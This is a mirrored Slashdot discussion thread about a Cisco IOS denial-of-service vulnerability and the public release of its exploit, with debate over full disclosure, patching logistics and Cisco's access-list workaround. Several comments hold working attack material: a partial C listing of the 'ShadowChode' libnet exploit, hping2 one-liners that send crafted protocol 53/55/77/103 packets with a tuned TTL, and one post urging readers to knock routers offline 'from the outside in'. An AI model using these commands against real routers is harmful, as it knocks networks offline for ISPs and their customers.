Slashdot Mirror
Exploit Available for Cisco IOS Vulnerability
GNUman writes "Cisco's IOS vulnerability, posted by Slashdot and CERT, has now a published exploit available, as reported recently by CERT. While there are some some articles claiming that the Internet survived a major flaw, maybe with a publicly available exploit could script kiddies start creating havock?. jerw134 wanted to start a pool to find out when the exploit would be publicly available, here's the answer."
About them Script Kiddies,
the internet's old plight.
Goin' all around,
usin' hacks they didn't write.
Them Script Kiddies lurk the net,
as devious little foes.
Keep them admins well employed,
and keeps them on their toes!
When Script Kiddies learn a trick,
it makes for one tight spot.
If you ain't patched up to date,
think again, because you ought.
How to be a Script Kiddy,
logon the net ad hoc.
Google for the hack you want,
and start your own havoc.
A programmer is a machine for converting coffee into code.
...the 'sploit is more easily available than the fix!
Anyone else gone through hell today trying to get the patch from Cisco?
Grrr... >-/
Hehe, good to see the creator gave admins plenty of time to patch / resolve problems with their Cisco gear...
If you haven't yet received notification from your NOC that they're going to be doing maintenance, you really need to impress upon them to get this fixed. In a nutshell, this flaw could allow a malicious hacker to shut down traffic to your servers.
Want to improve your Karma? Instead of "Post Anonymously", try the "Post Humously" option.
During these difficult economic times I've had to branch out and do some "web programming" along with my real programming contract work (mostly low level 4Q multi-threaded kernel hacking, etc.) and after doing some cursory studying and testing of various techniques I'm amazed at how badly most of the sites on the web are designed and how most of them use the wrong tool for the job.
For instance I was able to reduce the load time of a very well known and heavily traveled Fortune 500 website by moving all the graphics to black and white only, as they load on an average of Olog(n) faster than color graphics (where n is the number of pixels in the color graphic) thusly improving their UHCRF (unique hit customer retention factor) ratio by 35%!! I won't brag about the $10,000 bonus check I received from hitting that benchmark... heh. Other simple techniques like removing all interpreted languages (java, Visual Basic, c# etc.) and replacing them with low level compiled code (C, of course) has generated speed increases upwards of 25% and also increase the security of the site as a side effect.
It's a shame we don't teach IT people to spend some time to learn their trade inside and out instead of always forcing them to jump on the "flavour of the month" and use abstracted high level tools. As Leon Brooks sums it up in his famous book "The Mythical Man Month" - You'll never properly solve a programming problem by using tools that are not mature. Leon hit's the nail right on the head with that one.
Warmest regards,
--Jack
Wagner LLC Consulting Co. - Getting it right the first time
Now that it's been published, and Slashdot has broadcast it nice and loudly, surely the number of script kiddies planning on making use of this is significantly increasing. Not that I'm complaining about it being known - it'll really make certain people get their behinds in gear to fix it - but I'm sure we'll be seeing how serious of an exploit this is soon.
Let's see if we get significant network outages anywhere on the interenet anytime in the next few days/weeks...
"You know your god is man-made when he hates all the same people you do."
Surely you meant to say Sisqo?
Sad sad troll. No friends in the world.
(For evidence of trolling, consider his use of the name "Leon Brooks" for the person actually named -- as is well known by actually competent developers -- "Frederick P. Brooks"
Ok, maybe it's just me, but why is it that I have to provide Ciso with serial number, date of purchase and the name of my cat to get this fix? I mean - the fix is software, and it will only work on Ciso units. So - for crying out loud - put the patch on an FTP site and get over with it. Jumping through hoops to get the patch isn't going to speed things up.
My employer (U.S. Gov't) is too cheap to buy Cisco equipment! =P
Fascism should more properly be called corporatism because it is the merger of state and corporate power. -- Mussolini
coincidence?
or perhaps someone in my subnet finally figured out how to mirror torrentse.cx?
They'll be creating something but I don't know what. Hopefully it won't resemble havoc.
Thanks,
--
Matt
those links just point to the advisory which has been global news for a couple of days, anyone seen the actual exploit code or is this FUD from cert ?
Once again we see the power of open source! From anounced flaw to exploit in two days. Beat that Microshaft!..... Oh.... Wait.... This is not a good thing is it....
Papa Legba come and open the gate
You sir are the best troll who doesn't know he's a troll I've ever seen!!!!
1. No sig. 2. ???? 3. Profit!!!
This was seen as activity on the net last night by some of the MSS firms. It seems post-patching of the Cicso boxes results in higher CPU utilization for a godd while. Not sure why yet, but maybe due to all that bad traffic...
Other simple techniques like removing all interpreted languages (java, Visual Basic, c# etc.) and replacing them with low level compiled code (C, of course) has generated speed increases upwards of 25% and also increase the security of the site as a side effect.
if you're looking for a secure web development platform, Zope is good. Only 2 vulnerabilities in 5 years, and the Hotfixes were available almost immediately, added to this, they (the 2 vulnerabilities) were only local vulernabilities, not remotely exploitable. When the ISP I was working for was security audited, the Zope servers were amoung the few boxes that didn't have detectable vulernabilities. (and these were pro network security guys). Zope's written in Python and C.
I've already compiled this and tested against an internal router, fills up the input queue quite nicely. Requires libnet.h
-orbit0r
Glad I dodged the bullet, I've got every last router patKL()*$OFD_)#@ [LINK DOWN]
Thanks heaps.
Regards,
Cisco Systems.
If I'm reading this page correctly, the protocol type of the packet that causes the problem appears to be the PIM protocol:
/etc/protocols
grep 103
pim 103 PIM # Protocol Independent Multicast
"I drank what?" -Socrates
What an insight!!!!!!
I'm sure that the coming site support teams will talk a loooong time about the _real programmer_ guy who's been there before them.... Imagine the following:
- Hey, Joe, how the hell is this page header generated.....ooooooh, an executable....Nice!!!!;o))))
You know, I should agree that the nunmber of people in the web programming that don't have a clue what exactly they're doing is significant, that doesn't meen that you should come with a kernel module every time you want to generate an xml file.....
1. No sig. 2. ???? 3. Profit!!!
Today?
RR in upstate NY has bee dog-ass slow for 2 days straight now... despite the "network status" page being filled with "area down for cable maintenance/upgrades" for 3 days.
Oh look.. it says there's nothing wrong in my area.. bullshit!
No unauthorized use. Trespassers will be shot. Survivors will be shot again.
I've been searching thru the updated ios software, and the one that the advisory tells me to migrate to is way to big for my router. Plus it's not telling me whether it has 3des+ipsec support.
I don't think cisco's website is really that friendly.
you so clever!
i laugh long time!
i bet you tell that one to all you loser friends!
OMFG!
FUNNY MAN!
Importance of shaming those who published this exploit
There was very little time to act upon the new IOS version that Cisco provided to the public. The software upgrades were available to the public on Thursday morning at 00:00. CERT made their announcement about 15 minutes later. Today, the exploit is public. That is less than 48 hours to upgrade the hundreds of thousands (if not million+) Cisco routers across the world.
This is the most important security event effecting the Internet since the root DNS server attacks some time back, and this one is potentially much more severe. I have been surprised at the lack of media attention of this issue, or how some of my technical colleges have treated it. They don't seem to understand how many Cisco routers are out there.
It needs to be shown that by making the exploit of this vulnerability public so soon, the persons who did this only did so for publicity gain at the expense of others.
They hurt others to profit themselves, and that is no more cool than slavery is. And what did they get out of it? "My dick is bigger than yours."
I just don't want this to pass over and the people who made this exploit public think that what they did was cool, or that they are going to get a lot of admiration or karma for it. If they like the Internet, which they probably do, they just did the most harmful thing to it as they could have possibly done.
Imagine your typical packet kiddie running dozens of instances of the following pseudocode on his farm of a few hundred trojaned boxes:
}
If you haven't patched already - do it now.
wahahahha
cry me a river philosophy boy
Relax. This news has been going around the various vulnerability mailing lists for over a week now. Slashdot is late to the party (rightfully so).
The discoverer notified Cisco and everyone else, but held back on the exploit code until Cisco had a chance to work on it. Now that the word is out as well as the patch, don't waste time here when you should be patching your CATs (or looking for a new job).
sheesh.
I have something in common with Stephen Hawking...
Cisco released the fix two days ago to backbone providers. Other large customers could get the fix early yesterday. If you're affected by this vulnerability and it's not fixed yet:
It seems like Cisco handled this one correctly with the providers. I'm not sure how well large customers were handled, my guess is the .edu folks probably got screwed again.
----- obSig
Quack, quack.
I just tried this on our routers at work, it does not appear to work. I did n tice som pkt lss but a r nn
Bad boys rape our young girls but Violet gives willingly.
I had the impression that routing was a fairly straight-forward task and that 100% reliable software should be available for the routers. Has Cisco added frills to such an extent that the basic routing is compromised? Is this current problem associated with unnecessary features?
You don't read a lot, do you (or don't read the correct mailing lists)? The notification regarding this exploit went out some time ago. The discoverer worked with Cisco, releasing a notification regarding the exploit and some general information regarding cause and severity.
THEY HELD BACK ON THE EXPLOIT CODE UNTIL CISCO COULD DEVISE A PATCH.
Larger customers (ISPs, etc.) were taken care of in advance of the general public notification. Independent parties were no doubt already working on their own exploit code. It's quite common to release the patch and the exploit code at the same time; in fact, some parties prefer to release 0-Day exploit code... let's just be glad these particular folks didn't.
I have something in common with Stephen Hawking...
That's less than 48 hours, depending on which timezone you live in. Should be an interesting weekend for some.
You must be a mac user...get it...CISC blow? Aww never mind...
Any good suggestions on scripting the upgrades? What happens if you have over a few hundred routers? Life sucks I guess.
Back in middle school, where they told us all, "here's exactly what drug x looks like, what it does,and how to get it & use it... but please don't use it. That would be bad!" :) aieee!
4 years later... dang! Why are all the students on crack?
stuff |
Importance of shaming those who published this exploit
Why? Most ISPs are very grateful to have something to test if their countermeasures are effective.
Do you really want to upgrade all your core routers at once, and take the risk of introducing a bug which brings down your whole network? It's often better to apply some workaround and schedule an incremental update. In this case, you really want to test if your workaround is effective.
Your colleagues don't realize how many Cisco routers are out there? What, are your colleagues monkeys or something? That's like saying they didn't know how many copies of windows are running out there. Man, do I feel sorry for you. How many emails do *you* get a day that consist of "What's my password?" ?
-Looking for a job as a materials chemist or multivariat
A big middle finger to all of the idiots that don't belive in full disclosure:
Cisco IOS Exploit
You can also easily create the exploit using hping2.
Heres a link to the source in b64 format, you can extract it with:
openssl base64 -d -in cisco.txt -out cisco.tgz
Happy testing!
/* * pope1 */
or the old slashdotter up the penguin's ass
Does anyone have a windows 9x version?
Pull your head out of your ass. Cisco's already made the fixes available.
Here the exploit: http://www.securitylab.ru/_tools/shadowchode.tar.t ar .tar.gz file, incorrectly named.
It's
:wq
You discovered the ruse. Click here to claim your prize. *
* Prize not guaranteed
Black holes are where the Matrix raised SIGFPE
The following access list is specifically designed to block attack traffic. Note that the attack traffic can include spoofed source addresses. This access list should be applied to all interfaces of the device, and should include topology-specific filters. This could include filtering routing protocol traffic, management protocols, and traffic destined for the internal network. Protocol 103 is Protocol Independent Multicast (PIM), which is a commonly deployed application in multicast networks.
Interfaces with PIM enabled have not been found to be vulnerable to exploit traffic with protocol
103; PIM traffic may be permitted to those select devices.
access-list 101 deny 53 any any
access-list 101 deny 55 any any
access-list 101 deny 77 any any
access-list 101 deny 103 any any
!--- insert any other previously applied ACL entries here
!--- you must permit other protocols through to allow normal
!--- traffic -- previously defined permit lists will work
!--- or you may use the permit ip any any shown here
access-list 101 permit ip any any
= Grow a brain...
Bloat like a buggerfly, stink like a Klee!
Pleeeeeease?!!!!
In the cisco workaround they say to deny 53 any any.
Now wouldnt that block all incoming and outgoing DNS lookups?
As I mentioned in your other post about this, this is *not* the CatOS patch. Cisco discovered this themselves. The discoverers did have to work with Cisco, since they were Cisco.
No one outside Cisco had seen this until a few days ago. The problem is, once Cisco announced it, there were only so many combinations that could cause the problems they were mentioning, and someone found them, and posted it to Full-Disclosure.
With respect, you're partially right, but only partially, and the half-accurate stance you suggest is both attractive and dangerous.
From a moral and ethical standpoint, yes, many exploit postings are done for bad reasons - to garner street cred, create havoc, etc. (Of course, some are posted to force an issue, or as a necessary part of getting information to those who need it to fix their systems, but that argument can be found in plenty of other places, so no need to rehash it here.)
The thing to remember: from a practical standpoint, none of that matters one #$@% bit. Sure, it would be nice if "they" could be restrained by shame or any number of other things; it would also be nice if everyone's intelligence doubled every year. Bets, anyone?
What's important is dealing with the results, not wishing for stuff that would be nice but is highly unlikely to ever happen. When flaw n shows up, we need to fix it or mitigate it as well as we can. Hopefully we can even learn from the flaw, and avoid similar ones in the future. Or, if we can't avoid getting nailed, we go with a fallback plan. ('Course, if things go badly enough, the only backup plan may be "Make your peace with $ENV{DEITY} && die();" but that's a separate issue. :) )
I'm not saying that shaming a malefactor is a bad thing - if it improves the state of the world, great. However, it won't solve the immediate problem unless you can do it for every case, so for purposes of safety you might as well put effort into something that will actually help. When we're defending systems, we need to assume that attackers will do their worst, then plan and act accordingly. Avoiding a hole in our armor, or patching one when we find out about it, is much more logical than trying to get people to keep quiet about it.
As mentioned needs libnet
/* OH WAIT, ROUTE'S RESOLVER DOESN'T WORK! */
/* Mmmmm, suck up random amount of memory! */
padding for the lame filter
- - - -
Qui minim dolor ut duis odio consequat consectetuer molestie. Tincidunt ea ut elit sed accumsan veniam, eum nostrud vulputate, aliquam nulla exerci nisl hendrerit illum vulputate. Praesent commodo nibh nibh veniam odio hendrerit suscipit, consequat nulla enim, lobortis ea velit. Lorem molestie ut feugait, ut consequat, exerci praesent nostrud, luptatum tincidunt eros et zzril duis, ullamcorper volutpat dolore minim wisi dolore eu blandit delenit. At duis magna vel odio dolore ipsum ut enim dolore exerci veniam facilisis ex delenit illum ut nulla ut inQui minim dolor ut duis odio consequat consectetuer molestie. Tincidunt ea ut elit sed accumsan veniam, eum nostrud vulputate, aliquam nulla exerci nisl hendrerit illum vulputate. Praesent commodo nibh nibh veniam odio hendrerit suscipit, consequat nulla enim, lobortis ea velit. Lorem molestie ut feugait, ut consequat, exerci praesent nostrud, luptatum tincidunt eros et zzril duis, ullamcorper volutpat dolore minim wisi dolore eu blandit delenit. At duis magna vel odio dolore ipsum ut enim dolore exerci veniam facilisis ex delenit illum ut nulla ut inQui minim dolor ut duis odio consequat consectetuer molestie. Tincidunt ea ut elit sed accumsan veniam, eum nostrud vulputate, aliquam nulla exerci nisl hendrerit illum vulputate. Praesent commodo nibh nibh veniam odio hendrerit suscipit, consequat nulla enim, lobortis ea velit. Lorem molestie ut feugait, ut consequat, exerci praesent nostrud, luptatum tincidunt eros et zzril duis, ullamcorper volutpat dolore minim wisi dolore eu blandit delenit. At duis magna vel odio dolore ipsum ut enim dolore exerci veniam facilisis ex delenit illum ut nulla ut in.
-------------
/**
* ShadowChode - 0daze b0mb th4 fUq 0uT uV m0zT aNy c1sK0 r0ut3rz!@#
*
* Ping target router/switch for TTL to host. Subtract that number from 255
* and use that TTL on the command line. The TTL must equal 0 or 1 when it
* reaches the target. The target must accept packets to the given target
* interface address and there are some other caveats.
*
* BROUGHT TO YOU BY THE LETTERS C AND D
*
* [L0cK]
*/
#include <stdio.h>
#include <sys/types.h>
#include "libnet.h"
#define MIN_PAYLOAD_LEN (26)
#define CLEANUP { \
libnet_destroy(lh); \
free(payload); \
}
int
main(int argc, char *argv[])
{
char errbuf[LIBNET_ERRBUF_SIZE];
libnet_t *lh;
u_long dst_addr;
int ttl;
int payload_len;
char *payload;
libnet_ptag_t data_tag;
libnet_ptag_t ip_tag;
int i;
int len;
int protocols[] = { 53, 55, 77, 103 };
struct libnet_stats ls;
lh = libnet_init(LIBNET_RAW4, NULL, errbuf);
if (lh == NULL) {
(void) fprintf(stderr, "libnet_init() failed: %s\n", errbuf);
exit(-1);
}
if (argc != 3 || (dst_addr = libnet_name2addr4(lh, argv[1], LIBNET_RESOLVE) == -1)) {
(void) fprintf(stderr, "Usage: %s <target> <ttl>\n", argv[0]);
libnet_destroy(lh);
exit(-1);
}
{
struct in_addr dst;
if (!inet_aton(argv[1], &dst)) {
perror("inet_aton");
libnet_destroy(lh);
exit(-1);
}
dst_addr = dst.s_addr;
}
ttl = atoi(argv[2]);
libnet_seed_prand(lh);
len = libnet_get_prand(LIBNET_PR8);
payload_len = (MIN_PAYLOAD_LEN > len) ? MIN_PAYLOAD_LEN : len;
payload = (char *) malloc(payload_len);
if (payload == NULL) {
perror("malloc");
libnet_destroy(lh);
exit(-1);
}
for (i = 0; i < payload_len; i++) {
payload[i] = i;
}
data_tag = LIBNET_PTAG_INITIALIZER;
data_tag = libnet_build_data(payload, payload_len, lh, data_tag);
I just realized I made a small error in the above pseudocode. If you successfully hang closer routers you won't be have connectivity to more distant ones, so distant routers should be tried first. If the for loop is changed to read for $hopnum ($#hops..5), the effect is much greater assuming an equal number of vunerable routers.
Patch your vunerable Cisco gear ASAP!
Without full disclosure, what % of the routers out there would be patched right now? 10? Maybe.
It sounds to me like Cisco needs to get their genius engineers together to come up with a better way to distribute IOS images - one that does not involve e-mail, perhaps!
What the people did _was_ cool. They contacted Cisco a while back. Then they released the exploit almost *2 days* after the patch was announced.
Nice try bringing slavery in to this. That's rediculous.
"most harmful thing to it they could have possibly done." Please. Even if they released it 2 seconds before the patch was available, the Internet may have had instability for a day or two while Cisco ships out CDRs to everyone so they can fix it.
To those that choose full disclosure for security - I applaud you! I really appreciate having a program available that allows me to test if my systems are vulnerable and remain vulnerable post-patching.
> I just don't want this to pass over and the
> people who made this exploit public think that > what they did was cool, or that they are going
> to get a lot of admiration or karma for it. If
> they like the Internet, which they probably
> do, they just did the most harmful thing to it
> as they could have possibly done.
Wrong.
Whatever happened to the principle of accountability? If Cisco created this bug, this must be held accountable for it's effects.
I hold just about every technical Cisco ceritification save for the CCIE Security cert, and I believe it's important for vulnerabilities to be brought to the public domain. If not, we shield the manufacturers and those liable for the bug from their natural responsibilities and accountability. What would be the impetus for Cisco to patch their code quickly if they could rest on the complacency of knowing their flaws could be swept under the rug?
Do you want to know why Cisco patched their code so quickly? Because they were afraid. They have a reputation to maintain as a premier provider of networking solutions. They know there are plenty of script kiddies and network security professionals alike that would have learned this exploit sooner or later. Better to come public (even without exploit details) than to have someone with libnet and a sniffer surreptitiously discover this bug and use it maliciously well before anyone could take protective measures. If Cisco boxes get pummelled out in the field, then so be it. It will be that much less likely to happen in the future. The best remembered lessons are those learned the hard way.
So I congratulate Cisco for being upfront and showing all their cards to their customers. Their integrity will be rewarded for it.
However, I also congratulate those who published the exploit for keeping manufacturers like Cisco honest and forcing the industry to "keep the bar high". It benefits everybody and helps to ensure a more secure internet after the fact.
The script kiddie should have include(d) for the *alloc functions. The malloc cast is unnecessary and wrong by ANSI-C standard. He casts fprintf void which means he's explicitly discarding the return which is confusing. He never checks return values on a lot of the libnet functions. What if the fail?
Bad script kiddie; no props for you.
shadowchode.tar.gz
la la la la laaaaaaaaaaaaaaa
I am not against making the exploit public at all -- just not within the first few days of the exploit discovery. Considering the quantity of systems effected and the fact that many Cisco devices are remote makes patching difficult.
Personally, I want to throw the exploit against some of my own equipment just for fun too.
There will be Cisco devices vulnerable to this exploit for years to come. As a consultant, I commonly come across old Cisco routers that have not had their software upgraded in years. Not every sysadmin knows how to deal with a Cisco -- they just pass traffic through it.
There'd been a bunch of stuff going around on FD about it that I was under the impression that the two subjects were related since the effect was largely the same (send specially-crafted packets, port fills up, shuts down, requires reboot of switch).
I still say the release of exploit code is no big deal in this case. As you said, the combos were limited, so anyone with half a clue could figure it out without someone releasing code.
I have something in common with Stephen Hawking...
I like full disclosure -- just not within 48 hours of such a major vulnerability.
Almost two days is not sufficient time given the quantity of systems that this problem effects and the severity of the problem.
Twisting around and bending backwards like that to kiss your own Ass ?
Maybe next week uncle Billy Bob will come here with his own sore back and brag about how he removed your C code in favor asm code to get a cool 30% increase in speed.
But of course we all know that EASE of updating and cutting edge tech just went out the window......
If you look at the IOS builds that have the fix in them they are from about 10 weeks ago. In some cases there are 2 8-week incremental builds of a major IOS branch that aren't vulnerable.
Most likely they alerted certain govenment agencies after posting the fix, and waited for an all-clear before they publicly announced it. If you happened to use a recent IOS you were already fine - unfortunately updating IOSs is often more dangerous than not so most people will be running older IOS unless notified.
and shoving it up my ass that it's easier to crawl out of bed in the morning.
I think your sig should be "Thomas J. Advertisement interim CEO/Founder/Shameless Slashdot Shill - Melior, Inc."
LOL, at least I sign and stand for what I say...
Seriously, though, would you not agree that the benefit of getting the word out outweighs the risk of getting flames, such as yours?
Thomas J. Ackermann interim CEO/Founder - Melior, Inc. iSecure - CyberWarfare Defense www.dDos.com thomas@ddos.com
Right now my post is +1 Funny and your post is -1 Troll. So much for getting the word out.
For those of you who are attempt to workaround this, and happen to have hping2, here's how to do it. To get the TTL, just ping the destination and subtract from 255, for instance a ping with TTL 251, you'd enter 4. Choose which protocol to use of the four.
/dev/urandom
hping2 (dest ip) -0 -t (ttl from above) -H (53,55,77, 103) -d 128 -E
If an e-mail contains the sentence "this is not spam", my spam-filter automatically cans it. And in 99.9999% of these cases my filter's decision turns out to be right.
If in a conversation, somebody says "I don't like to criticise you, but...", expect that follows a criticism of you.
If a car mechanic tells you "trust me, I'll have your car ready by next Wednesday, no problem!", you can be sure that it won't be ready.
Likewise, if a slashdot post says "I don't troll", the smart moderator moderates accordingly...
The CatOS bug only kills management traffic to the router - telnet, ssh, http, etc. Traffic going *through* the router remains unaffected.
The IOS bug causes the affected interface to drop all incoming traffic, management or production.
Now it's possible that a common bug could have causeed both, and it's also possible that the CatOS bug prompted Cisco to take a closer look at the IOS code and led to the discovery of this one. But by all accounts, the IOS bug was discovered internally by Cisco engineers. The exploit was found by someone else after the vulnerability was announced.
Shiggity shiggity shwa!
Here's how to take a router down:
/dev/urandom
Assuming you're using debian.
apt-get install hping2
ping
Subtract x in ttl=x from 255
then run:
hping2 -t -H 55 -d 128 -E
enjoy...
and remember.. if you take down your ISPs gateway first you won't be able to do further damage.. start from the outside in.
If you look at the release dates of some of the code that is not vulnerable to this attack, it goes back to early June. To me, it looks like this was identified almost two months ago. The question then is: Was this suddenly announced once a planned mile-marker in IOS revisions had been met....or once they suspected the exploit was in the wild?
That is less than 48 hours to upgrade the hundreds of thousands (if not million+) Cisco routers across the world.
So do them in parallel.
Hell, give me access. I'll upgrade a few million routers in less than 48 hours, no prob.
And I am a lazy pothead sys admin. I don't even work on routers.
From the posted source, you shouldn't have it anyway. Now, go away.
How is this a big middle finger to people that don't believe full disclosure is a good idea for something of this gravity? Major ISP's and Major providers (for which I work) didn't hear about this but 48 hours before the exploit was made public.
Cisco tried their hardest to prevent info from getting out to make it easy to create an exploit, but data was leaked. What has this done? It's left hundreds of thousands to millions of routers, with not nearly enough admins to patch, vulnerable to the losers who have already posted (in reply to your message no less) "Is there a win9x version?". What do you think HE is going to do with it? Test his network? Hah!
I believe in full disclosure, and I wish that I had been more in the know during this process, but I have to ask myself why? I wanted to be more in the know so that I could feel more important than other people. Boy, that's selfish. Maybe you should consider that there are more important things than getting a 'sploit -- like giving the INTERNET an opportunity to respond to a major threat.
That, or you could be segmented from your favorite pr0n site. Your choice.
here
" I'm going to say an exploit by tommorow. End of the internet by Sat. All back to normal on Monday"
Rus
Cheap UK and US VPS
worked against my 1005.. sadly :P)
As I first saw this, and figured you'd mis-spelled 10053, because there really SHOULD be an "e" at the end... Then realized that "loose" doesn't fit in the sentence.
Ah well. Stupid me.
-Ben
I have no problem with your religion until you decide it's reason to deprive others of the truth.
So far it has been 4 hours since my e-mail... no response whatsoever
Lemme guess.
Your request for help to cisco.com is not really going to go to 198.133.219.25 but to, uhm, a new different, uh, help center, that will be happy to send you an IOS sploit^H^H^H^H^H^H update to have you up and going in a jiffy.
"Provided by the management for your protection."
You serious? Sure, go nuts. I look forward to seeing what happens when the build you pick for a router three hops down doesn't support the STM-4 card you had in there, and stops you reaching the 20 networks behind it. Oh, and there's one over here that's running a new build with a BGP bug, so these 100 have fallen off the network. And three of these six in New York just plain didn't come back, we're not sure why yet. You've got out of band access to them all, right? right?
Upgrade with care. Even the most reliable kit develops problems a small percentage of the time; a small percentage of a lot of kit is a lot of kit.
Dave
What incentive would we have to defend ourselves if we didn't have predators to threaten us?
Sounds like smarter living through adoption of stupidity, and a long way around the block if you ask me.
Maybe corporations need to think a little longer and a little harder before they downsize their IT staff? :)
It's a real good thing that this one can be fixed
with an access list, because what CISCO *doesn't*
mention when they so "responsibly" provide
upgraded IOS versions is that they are not going
to provide fixes for versions they consider
obselete... and the ones they do provide will not
fit into the flash or RAM available on a lot of
routers out there. If it were not for the
access-list workaround several people would be
left naked with no shelter on this one until they
buy new hardware.
Not to mention the fact that it is often the case
that you can buy a router from CISCO and, when you
buy it, buy the maximum amount of flash and RAM
available for that model, and *still* find that
by the time you receive the product, the latest
IOS version requires more than you have. We've
even had situations where the amount of flash to
run a current IOS on a particular chassis was not
even available for the chassis when we ordered the
router. (Stuff like this doesn't happen so much
in the low-end/CPE market but for core routers it
happens all the time.)
CISCO isn't the only one but this is completely
inconsiderate if not intentional (and possibly
criminal). It simply is not possible, even in a
cluster-f**k huge corporation, for this type of
mistake to be made over and over and over without
someone from hardware correctly anticipating
the size and footprint of IOS to offer a product
that doesn't need a hardware upgrade every single year.
you're a dork.
Get a life. You've never seen a cisco in your life.
I was contacted last night by UUnet, and tonight they are adding ACLS to all of my edge routers.
:) I love outsourcing.
Myself, I'm drinking a beer.
Ingress filtering on a Cisco via ACLs is only effective on the 75xx class routers.
On other Cisco IOS products, the input queue processing preceeds the ACL processing, so these devices can be DoS'd no matter what ACLs are in place.
Well, I would hope that if one is running a shop with a large quantity of Cisco boxes, one would have taken the neceesary time to lock down these boxes to prevent unnecessary access to them. Whether it means stting up ACLs at the edge of your network to prevent bogus/unauthorixed access to the devices/interfaces, or ACLs on the boxen themselves this should have been done a loong time ago. Granted you don't want an excessive (or any, for that matter) ACLs on your core router. A good engineer, IMNSHO would have limited up the amount of amount of protocols/sources accpeted by critical pieces of infrastructure. ;-)
As an aside, what is a good time to release the exploit into the wild? What if the exploit was exploited _prior_ to Cisco getting the word out on the recommended fix? Would you have preferred 72 hours, or maybe after you returned from your summer vacation
The truth of the matter is that Cisco is not the only network equipment maker out there. And there's a good chance that a lot of routing code that IS out there is shared by several different vendors' equipment. How could makers of non-Cisco equipment test their equipment to ensure that it doesn't suffer the same flaw without any specific details and without an exploit? How could customers who own non-Cisco equipment be sure that their networks are safe?
Despite what EULAs say, most software is sold, not licensed.
I work for a very big ISP.
Our chief security officer was urging people to soft-peddle the vulnerability and our response to it, because it was very difficult to exploit, and an exploit wouldn't be widely available for weeks.
The presence of the exploit and its successful deployment against sacrificial goat networks shut him up.
sounds like you are a jerk. what was that all about?
crap crap and crap
if this patch is so important, then you act on it straight away.... even 24 hours is enough!
BUT if you've read the vulnerability info, and looked at the exploit, you'd see that this issue
isnt as bad as it seems.
Bob Brooks (dear old Dad) has made significant contributions in the Australian mining industry, his twin Colin Brooks is a well-known consulting geologist, their brother Don Brooks runs Harvestaire, and grandpa Charles Alfred Brooks made himself famous for finding things out about sports that helped people to do them better, but yes, the man you really want is Fred Brooks, famous for statements like "adding manpower to a late project makes it later".
:-)
My main claim to fame seems to be for abusing people in public (-: For which I am indebted to several skilled exemplars, who probably all know who they are
Kudos to Russel Steicke for pointing out this post to me.
Got time? Spend some of it coding or testing
Maybe, but in reality, what's happened here is a vendor has just come to you and said, "Hi there! Guess what, there's been a bug in our code since day one, an amazingly simple little thing that no one has noticed till now. You should trust us to find these things earlier, but we've violated that trust and proven that we're no good at catching bugs in IOS. The fix is to run this sparkly new IOS that no one has ever used before! Please, install this on all your routers and switches within the next 36 hours because there's gonna be an exploit out."
The first thing that any logical person who's dealt with a vendor in the past must think is, "Oh crap, new, untested version that I have to deploy to all of the routers across my enterprise within 36 hours. There's a good chance that this vendor who has proven they can't catch bugs is going to have another bug in the software, causing my network to crash".
In this case, it doesn't matter how many members of the IT staff you have or don't have. If they were able to keep their information closer to the vest for another week or two (which they were trying to do, but people who believe in immediate full disclosure decided to derail that), businesses would have been able to burn in the new code to make sure that all of their requirements are met and that there are no other bugs that regression testing would have found.
I am in CCNA training right now (Sem 3 done), and I can bring a router from nothing to fully operational using different protocols and routing methods in a short matter of time. I don't know how to make a specially crafted IPv4 packet. Anybody know how to do this? And does anybody know the code to the said packet? Or is this just a specially long packet? I'm curious.
I got nothin'.
You're right, I was talking out my ass.
;)
But I bet maybe you and I could do it, with enough time, a database of details and perl/expect.
There are only a certain number of possible combinations of Cisco router hardware. If we knew their current state of hardware and software revisions, it should be possible to custom build an ios prom or patch the existing os to bring it in line with production.
Well, that's the way I look at these things. Let the software hash out the details, just make sure you get all the bases covered and run the script through intensive QA before deployment.
I bet a Cisco CCIE could do it. They can do anything.
Thanks for being honest. :D I gotta admit, I was feeling a bit ratty last night when I posted too.
./reload-all -- but I'd be a bit screwed if any one of them had a funny I didn't know about.
:)
Thing is, in theory the upgrades would go fine; in practice they won't - you'll hit SOME funny that you couldn't have predicted, and the consequences are just too serious to let it go. The longer you have to plan and enact the upgrade, the smoother it'll go, and the less hurt you'll cause your customers.
I've got an 8-hour day planned tomorrow (Sunday) do upgrade our network at work, and we're looking at that much time just to do the critical boxes (20-odd) with leeway for funnies, and in an order that lets us recover if it goes to shit somewhere. We'll be doing a little parallel stuff, but not much. In theory I could upload the IOSes to the flash cards tonight, log in tomorrow from home and run
You're right though. Cisco CCIEs are one step from godhood. I fear them.
Dave